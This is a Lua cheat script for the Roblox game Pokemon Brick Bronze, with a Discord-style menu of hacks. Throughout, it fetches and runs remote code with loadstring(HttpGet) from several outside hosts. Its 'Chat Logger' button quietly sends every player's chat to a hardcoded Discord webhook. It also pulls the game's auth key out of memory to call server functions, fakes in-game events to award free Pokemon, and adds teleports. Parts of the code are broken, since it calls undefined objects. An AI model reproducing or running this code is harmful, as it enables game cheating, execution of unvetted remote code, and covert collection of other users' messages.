
-- Discord Pokemon Brick Bronze

--[[
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠞⢳⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡔⠋⠀⢰⠎⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⢆⣤⡞⠃⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⢠⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢀⣀⣾⢳⠀⠀⠀⠀⢸⢠⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣀⡤⠴⠊⠉⠀⠀⠈⠳⡀⠀⠀⠘⢎⠢⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀
⠳⣄⠀⠀⡠⡤⡀⠀⠘⣇⡀⠀⠀⠀⠉⠓⠒⠺⠭⢵⣦⡀⠀⠀⠀
⠀⢹⡆⠀⢷⡇⠁⠀⠀⣸⠇⠀⠀⠀⠀⠀⢠⢤⠀⠀⠘⢷⣆⡀⠀
⠀⠀⠘⠒⢤⡄⠖⢾⣭⣤⣄⠀⡔⢢⠀⡀⠎⣸⠀⠀⠀⠀⠹⣿⡀
⠀⠀⢀⡤⠜⠃⠀⠀⠘⠛⣿⢸⠀⡼⢠⠃⣤⡟⠀⠀⠀⠀⠀⣿⡇
⠀⠀⠸⠶⠖⢏⠀⠀⢀⡤⠤⠇⣴⠏⡾⢱⡏⠁⠀⠀⠀⠀⢠⣿⠃
⠀⠀⠀⠀⠀⠈⣇⡀⠿⠀⠀⠀⡽⣰⢶⡼⠇⠀⠀⠀⠀⣠⣿⠟⠀
⠀⠀⠀⠀⠀⠀⠈⠳⢤⣀⡶⠤⣷⣅⡀⠀⠀⠀⣀⡠⢔⠕⠁⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠫⠿⠿⠿⠛⠋⠁⠀
--]]

local DiscordLib = loadstring(game:HttpGet"https://raw.githubusercontent.com/discordxj2shn0001/aid/main/discord%20lib")()



local Win1 = DiscordLib:Window("Pokemon Brick Bronze Client") -- Title/Name

local Tab1 = Win1:Server("Cheats", "") -- Server/Tab



-- channels

local Chann1 = Tab1:Channel("General") -- Channel 0_0
local Chann2 = Tab1:Channel("Misc")
local Chann3 = Tab1:Channel("Anthian City (💎)")
local Chann4 = Tab1:Channel("Aredia City (AFK)")
local Chann5 = Tab1:Channel("Lagoona Lake (🐠)") -- Channel 0_0







Chann1:Button("Heal", function()
Get:InvokeServer(AuthKey, "PDS", "getPartyPokeBalls")

DiscordLib:Notification("Notification", "Pokemon Healed", "Okay!") -- The Scirpt The Button Executes
end)


Chann1:Button("Save (may be broken)", function()

local args = {
    [1] = "O@_^_<*i.4SAUL[0ti45",
    [2] = "PDS",
    [3] = "saveGame",
    [4] = {
--        ["location"] = "gniiCoXqvywjQ7LCdoeGAAAAAAgxor7edMIA",
        ["expShareOn"] = false,
        ["options"] = {
            ["autosaveEnabled"] = false,
            ["bagEnabled"] = false,
            ["reduceGraphics"] = false,
            ["lastUnstuckTick"] = 0
        }
    }
}

game:GetService("ReplicatedStorage").GET:InvokeServer(unpack(args))
end)






Chann1:Button("Servers", function()
loadstring(game:HttpGet("https://www.scriptblox.com/raw/Server-Browser_80", true))();
DiscordLib:Notification("Notification", "Available Servers Listed", "Okay!") -- The Scirpt The Button Executes

global.NPCChat:say("Opening Server List.")

end)

Chann2:Button("CTRL + Click Tp", function()
local Plr = game:GetService("Players").LocalPlayer local Mouse = Plr:GetMouse()

Mouse.Button1Down:connect( function() if not game:GetService("UserInputService"):IsKeyDown(Enum.KeyCode.LeftControl) then return end if not Mouse.Target then return end Plr.Character:MoveTo(Mouse.Hit.p) end )
DiscordLib:Notification("Notification", "Click + Tp Enabled", "Okay!") -- The Scirpt The Button Executes

global.NPCChat:say("Click + Tp Enabled.")

end)

Chann1:Button("Rejoin", function()
loadstring(game:HttpGet("https://pastebin.com/raw/1gtVMUz3"))()
DiscordLib:Notification("Notification", "Rejoining Server", "Okay!") -- The Scirpt The Button Executes

global.NPCChat:say("Rejoining Server.")

end)






Chann1:Button("Tiny Gui Script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/discordxj2shn0001/aid/main/tiny%20gui%20pbb"))()
DiscordLib:Notification("Notification", "Opening mini gui", "Okay!") -- The Scirpt The Button Executes

end)












Chann2:Button("Chat Logger", function()
local marketplaceService = game:GetService("MarketplaceService")

local isSuccessful, info = pcall(marketplaceService.GetProductInfo, marketplaceService, Game.PlaceId)
if isSuccessful then

local wh = 'https://discord.com/api/webhooks/991047971292471318/yp6L9Cv1WERC8gTQsrRV0HWVIssypCmY-Z-hFsUuf83KpYBW6uvDlFvB3qj5RDdR__Zc'
local embed1 = {
       ['title'] = 'Beginning of Message logs on '..info.Name.." at "..tostring(os.date("%m/%d/%y at time %X"))
   }
local a = syn.request({
   Url = wh,
   Headers = {['Content-Type'] = 'application/json'},
   Body = game:GetService("HttpService"):JSONEncode({['embeds'] = {embed1}, ['content'] = ''}),
   Method = "POST"
})
function logMsg(Webhook, Player, Message)
   local embed = {
       ['description'] = Player..": "..Message.."  " ..tostring(os.date("| time %X")) 
   }
   local a = syn.request({
       Url = Webhook,
       Headers = {['Content-Type'] = 'application/json'},
       Body = game:GetService("HttpService"):JSONEncode({['embeds'] = {embed}, ['content'] = ''}),
       Method = "POST"
   })
end
for i,v in pairs(game.Players:GetPlayers()) do
   v.Chatted:Connect(function(msg)
       logMsg(wh, v.Name, msg)
   end)
end

game.Players.PlayerAdded:Connect(function(plr)
   plr.Chatted:Connect(function(msg)
       logMsg(wh, plr.Name, msg)
   end)
end)
end
end)








Chann2:Button("Chat Translator", function()
loadstring(game:HttpGetAsync('https://i.qts.life/r/ChatInlineTranslator.lua', true))()
--[[
af = "Afrikaans",
    sq = "Albanian",
    am = "Amharic",
    ar = "Arabic",
    hy = "Armenian",
    az = "Azerbaijani",
    eu = "Basque",
    be = "Belarusian",
    bn = "Bengali",
    bs = "Bosnian",
    bg = "Bulgarian",
    ca = "Catalan",
    ceb = "Cebuano",
    ny = "Chichewa",
    ['zh-cn'] = "Chinese Simplified",
    ['zh-tw'] = "Chinese Traditional",
    co = "Corsican",
    hr = "Croatian",
    cs = "Czech",
    da = "Danish",
    nl = "Dutch",
    en = "English",
    eo = "Esperanto",
    et = "Estonian",
    tl = "Filipino",
    fi = "Finnish",
    fr = "French",
    fy = "Frisian",
    gl = "Galician",
    ka = "Georgian",
    de = "German",
    el = "Greek",
    gu = "Gujarati",
    ht = "Haitian Creole",
    ha = "Hausa",
    haw = "Hawaiian",
    iw = "Hebrew",
    hi = "Hindi",
    hmn = "Hmong",
    hu = "Hungarian",
    is = "Icelandic",
    ig = "Igbo",
    id = "Indonesian",
    ga = "Irish",
    it = "Italian",
    ja = "Japanese",
    jw = "Javanese",
    kn = "Kannada",
    kk = "Kazakh",
    km = "Khmer",
    ko = "Korean",
    ku = "Kurdish (Kurmanji)",
    ky = "Kyrgyz",
    lo = "Lao",
    la = "Latin",
    lv = "Latvian",
    lt = "Lithuanian",
    lb = "Luxembourgish",
    mk = "Macedonian",
    mg = "Malagasy",
    ms = "Malay",
    ml = "Malayalam",
    mt = "Maltese",
    mi = "Maori",
    mr = "Marathi",
    mn = "Mongolian",
    my = "Myanmar (Burmese)",
    ne = "Nepali",
    no = "Norwegian",
    ps = "Pashto",
    fa = "Persian",
    pl = "Polish",
    pt = "Portuguese",
    pa = "Punjabi",
    ro = "Romanian",
    ru = "Russian",
    sm = "Samoan",
    gd = "Scots Gaelic",
    sr = "Serbian",
    st = "Sesotho",
    sn = "Shona",
    sd = "Sindhi",
    si = "Sinhala",
    sk = "Slovak",
    sl = "Slovenian",
    so = "Somali",
    es = "Spanish",
    su = "Sundanese",
    sw = "Swahili",
    sv = "Swedish",
    tg = "Tajik",
    ta = "Tamil",
    te = "Telugu",
    th = "Thai",
    tr = "Turkish",
    uk = "Ukrainian",
    ur = "Urdu",
    uz = "Uzbek",
    vi = "Vietnamese",
    cy = "Welsh",
    xh = "Xhosa",
    yi = "Yiddish",
    yo = "Yoruba",
    zu = "Zulu"
--]]

global.NPCChat:say("Chat Translating.")
end)


Chann2:Button("Absol + Eevee", function()
local _p = nil
        for _, v in pairs(getgc(true)) do
           if typeof(v) == "table" then
               if rawget(v, "PlayerData") then
                   _p = v
                   break
               end
           end
        end
        
        print(_p.PlayerData:completeEvent("GetAbsol"))
        print(_p.PlayerData:completeEvent("Eevee2Awarded"))
global.NPCChat:say("Free Pokemon.")
end)






--Chann2:Toggle("Chat Logger",false, function(bool)
--end)



local sldr = Chann2:Slider("FPS Control", 15, 320, 144, function(t) -- A Slider
                                    -- lowest , largest , starting
pcall(setfpscap, t)
pcall(set_fps_cap, t)
print(t) -- Script The Slider Executes
end)






Chann5:Button("Afk Hatch", function()
 
    
--Services
local uis = game:GetService('UserInputService');
local vim = game:GetService("VirtualInputManager")
local bind = Enum.KeyCode.M;


uis.InputBegan:connect(function(key)
    if key.KeyCode == bind then
        --Key Script
      
        
        vim:SendKeyEvent(true, "W", false, nil) vim:SendKeyEvent(true, "A", false, nil)
       wait(0)
        
    end;
end)


global.NPCChat:say("Press m to toggle.")   
DiscordLib:Notification("Notification", "Press m to toggle.", "Okay!") -- The Scirpt The Button Executes
end)


Chann5:Button("Daycare Man", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(259.499, 109.8, -1059.0546)
game.Players.LocalPlayer.Character.HumanoidRootPart.Rotation = Rotation.new(180, -75, 60)



DiscordLib:Notification("Notification", "Going To Daycare Man.", "Okay!") -- The Scirpt The Button Executes
global.NPCChat:say("Teleporting You.")

end)


Chann5:Button("PC", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(312, 110, -1066)






DiscordLib:Notification("Notification", "Going To PC.", "Okay!") -- The Scirpt The Button Executes
global.NPCChat:say("Teleporting You.")

end)




Chann3:Button("Pokeballs", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-264.97802, 66.57825, 582.357)





--DiscordLib:Notification("Notification", "Going To Ball Shop.", "Okay!") -- The Scirpt The Button Executes
global.NPCChat:say("Teleporting You.")

end)



Chann3:Button("Stoneshop", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-342.9316, 59.25, 713.64)





--DiscordLib:Notification("Notification", "Going To Ball Shop.", "Okay!") -- The Scirpt The Button Executes
--global.NPCChat:say("Teleporting You.")

end)



Chann4:Button("Money Farm TP", function()
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-364, 38, 1474.265)
wait(10)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1194.89001, 54, -702)
end)







Chann1:Seperator() -- Keep This If You Want To









---------------------------
---------------------------
---------------------------
---------------------------




Window:AddSlider({
    text = 'Interval',
    min = 0.01,
    max = 2,
    value = 1,
    float = 0.01
})
Box_1 = Window:AddBox({
    text = "AutoClick Position:",
    value = "X: " .. X .. ", Y: " .. Y,
    callback = function()
        if tick()-LastU > 0.1 then
            LastU = tick()
            Box_1:SetValue("X: " .. X .. ", Y: " .. Y)
        end
    end
})

Library:Init()

---------------------------
---------------------------
---------------------------
---------------------------


--local drop = Chann1:Dropdown("Pick me!",{"Option 1","Option 2","Option 3","Option 4","Option 5"}, function(bool) -- A DropDown
--game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new() -- tp location
--print(bool) -- You Know 0_o
--end)

Chann1:Label("cheat by j2sh") -- A Label (Ofc)


---------------------------
---------------------------
--pokemon brick bronze chat messages 
---------------------------

local global = "_p" --Way too easy tbh
for i,v in pairs(debug.getregistry()) do
if type(v) == 'function' then
for i,v in pairs(debug.getupvalues(v)) do
local ret,tab = pcall(function() return v["NPCChat"] end)
if ret == true and type(tab) == "table" then
global = v
break
end
end
end
end


---------------------------
---------------------------
---------------------------
---------------------------

 
Get = game:GetService("ReplicatedStorage").GET
function GetMainData()
    for i, v in pairs(debug.getregistry()) do
        if typeof(v) == "function" then
            for a, b in pairs(debug.getupvalues(v)) do
                if typeof(b) == "table" and rawget(b, "Fishing") then
                    return b
                end
            end
        end
    end
end
Data = GetMainData()
AuthKey = debug.getupvalue(Data["Network"]["getAuthKey"], 1)
 
local SF = {}
SF["Fish"] = Data["Fishing"]["Fish"]
SF["Fly"] = Data["Menu"]["map"]["fly"]
 
AddButton("Heal", function()
Get:InvokeServer(AuthKey, "PDS", "getPartyPokeBalls")
end)

local key = game:GetService("UserInputService")

--key.InputBegan:Connect(function(input)
--	if input.KeyCode == Enum.KeyCode.F then

--global.NPCChat:say("Pokemon Fully Healed")
--	end
--end)






---------------------------
---------------------------
---------------------------
---------------------------




-- AFK AFK AFK AFK AFK AFK BLOCK --
local vu = game:GetService("VirtualUser")

game:GetService("Players").LocalPlayer.Idled:connect(function()

vu:Button2Down(Vector2.new(0,0),workspace.CurrentCamera.CFrame)

wait(1)

vu:Button2Up(Vector2.new(0,0),workspace.CurrentCamera.CFrame)

end)



---------------------------
---------------------------
---------------------------
---------------------------

-- FPS FPS FPS --

_G.Settings = {
    Players = {
        ["Ignore Me"] = true, -- Ignore your Character
        ["Ignore Others"] = true -- Ignore other Characters
    },
    Meshes = {
        Destroy = false, -- Destroy Meshes
        LowDetail = true -- Low detail meshes (NOT SURE IT DOES ANYTHING)
    },
    Images = {
        Invisible = true, -- Invisible Images
        LowDetail = false, -- Low detail images (NOT SURE IT DOES ANYTHING)
        Destroy = false, -- Destroy Images
    },
    Other = {
        ["No Particles"] = true, -- Disables all ParticleEmitter, Trail, Smoke, Fire and Sparkles
        ["No Camera Effects"] = true, -- Disables all PostEffect's (Camera/Lighting Effects)
        ["No Explosions"] = true, -- Makes Explosion's invisible
        ["No Clothes"] = true, -- Removes Clothing from the game
        ["Low Water Graphics"] = true, -- Removes Water Quality
        ["No Shadows"] = true, -- Remove Shadows
        ["Low Rendering"] = true, -- Lower Rendering
        ["Low Quality Parts"] = true -- Lower quality parts
    }
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/FPSBooster.lua"))()

---------------------------
---------------------------
---------------------------
---------------------------




































